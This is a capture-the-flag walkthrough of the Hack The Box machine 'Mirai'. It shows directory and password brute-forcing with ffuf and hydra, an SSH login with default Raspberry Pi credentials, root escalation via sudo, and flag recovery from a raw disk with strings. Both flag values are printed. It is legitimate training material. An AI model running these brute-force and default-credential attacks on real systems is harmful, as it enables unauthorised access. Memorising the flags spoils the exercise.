Mirai

August 1st, 2020

Mirai logo

This is an easy linux box

Tools used

  • bunzip2
  • cat
  • cd
  • cewl
  • chmod
  • ffuf
  • hydra
  • ls
  • nmap
  • python
  • ssh
  • strings
  • sudo
  • tar
  • wget

Reconnaissance

Nmap

nmap -sC -sV -oA mirai 10.10.10.48 -v

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey: 
|   1024 aa:ef:5c:e0:8e:86:97:82:47:ff:4a:e5:40:18:90:c5 (DSA)
|   2048 e8:c1:9d:c5:43:ab:fe:61:23:3b:d7:e4:af:9b:74:18 (RSA)
|   256 b6:a0:78:38:d0:c8:10:94:8b:44:b2:ea:a0:17:42:2b (ECDSA)
|_  256 4d:68:40:f7:20:c4:e5:52:80:7a:44:38:b8:a2:a7:52 (ED25519)
53/tcp open  domain  dnsmasq 2.76
| dns-nsid: 
|_  bind.version: dnsmasq-2.76
80/tcp open  http    lighttpd 1.4.35
| http-methods: 
|_  Supported Methods: OPTIONS GET HEAD POST
|_http-server-header: lighttpd/1.4.35
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Here’s what nmap teaches us :

  • port 22 (SSH) - OpenSSH 6.7p1
  • port 53 (DNS) - dnsmasq 2.76
  • port 80 (HTTP) - lighttpd 1.4.35

Let’s first see the web port. This is a blank page ! Time for some files/directories brute force :

ffuf -w /home/liodeus/directory-list-lowercase-2.3-medium.txt -u http://10.10.10.48/FUZZ -e .txt,.php -t 80

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.1.0-git
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.10.48/FUZZ
 :: Wordlist         : FUZZ: /home/liodeus/directory-list-lowercase-2.3-medium.txt
 :: Extensions       : .txt .php 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 80
 :: Matcher          : Response status: 200,204,301,302,307,401,403
________________________________________________

admin                   [Status: 301, Size: 0, Words: 1, Lines: 1]
versions                [Status: 200, Size: 18, Words: 1, Lines: 1]

The interesting part is /admin :

Website admin page

This is the interface of a Pi-Hole. Let’s seee if there is known exploit :

Searchsploit Pi-Hole

I need credentials to use the RCE ! I tried to connect with default passwords :

  • administrator
  • root
  • toor
  • Pi-hole
  • pi-hole
  • admin
  • mirai

Try brute force with hydra :

hydra -l admin -P /home/liodeus/wordlist/rockyou.txt 10.10.10.48 http-post-form "/admin/index.php?login:pw=^PASS^:Wrong password" -Vv

Generate a wordlist from the words on the website :

cewl -m 4 --with-numbers -w dictiFromWebsite http://10.10.10.48/admin/

Retry brute force with hydra, but with the newly created wordlist :

hydra -l admin -P ./dictiFromWebsite 10.10.10.48 http-post-form "/admin/index.php?login:pw=^PASS^:Wrong password" -Vv

Didn’t work ! So I thought about the name of the box “mirai”. If the default username-and-password combo is not changed, Mirai is able to log into the device and infect it https://www.cloudflare.com/learning/ddos/glossary/mirai-botnet/.

Searching Google for default credentials, I stumble upon this (https://discourse.pi-hole.net/t/password-for-pre-configured-pi-hole/13629):

As installed from a new Raspbian image, the default password for user pi is raspberry.

So the SSH credentials by default is :

  • user : pi
  • password : raspberry

Exploit

Let’s try this default credentials on the SSH :

ssh pi@10.10.10.48
pi@10.10.10.48's password: 

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Aug 27 14:47:50 2017 from localhost

SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.


SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.

pi@raspberrypi:~ $ whoami
pi

And I’m in ! Now let’s escalate to root, for that I first try to see if I can run commands as someone else :

sudo -l
Matching Defaults entries for pi on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User pi may run the following commands on localhost:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: ALL

User pi can run any command as root on this system, nice ! Let’s get a shell a root :

pi@raspberrypi:~ $ sudo su
root@raspberrypi:/home/pi# whoami
root

I’m root, so let’s read root.txt :

root@raspberrypi:~# cat root.txt 
I lost my original root.txt! I think I may have a backup on my USB stick...

USB so go to the media directory :

root@raspberrypi:/home/pi# cd /media/
root@raspberrypi:/media# ls
usbstick

Let’s see what’s is the usbstick directory :

root@raspberrypi:/media# cd usbstick/
root@raspberrypi:/media/usbstick# ls
damnit.txt  lost+found
root@raspberrypi:/media/usbstick# cat damnit.txt 
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?

-James

Deleted my files ! Not cool James. To recover a file I first tried with photorec/testdisk :

wget https://www.cgsecurity.org/testdisk-7.2-WIP.linux26.tar.bz2

Start python server for easy file transfert :

python -m SimpleHTTPServer

On the pi get the file :

wget http://10.10.14.10:8000/testdisk-7.2-WIP.linux26.tar.bz2

Uncompress it :

bunzip2 -d testdisk-7.2-WIP.linux26.tar.bz2

tar xvf testdisk-7.2-WIP.linux26.tar

Gives execution rights :

cd testdisk-7.2-WIP
chmod +x photorec_static
chmod +x testdisk_static

Unfortunatly, after many tries, I couldn’t make it recover the file ! So how to recover it ? The answer is that everything is a file on linux ! Even the drive :

Croot@raspberrypi:/strings /dev/sdb
strings /dev/sdb
x-#_x-#_
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
/media/usbstick
2]8^
lost+found
root.txt
damnit.txt
>r &
3d3e483143ff12ec505d026fa13e020b
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?
-James

And here is the flag : 3d3e483143ff12ec505d026fa13e020b

Flags

User.txt

root@raspberrypi:/home/pi/Desktop# cat user.txt 
ff837707441b257a20e32199d7c8838d

Root.txt

strings /dev/sdb
3d3e483143ff12ec505d026fa13e020b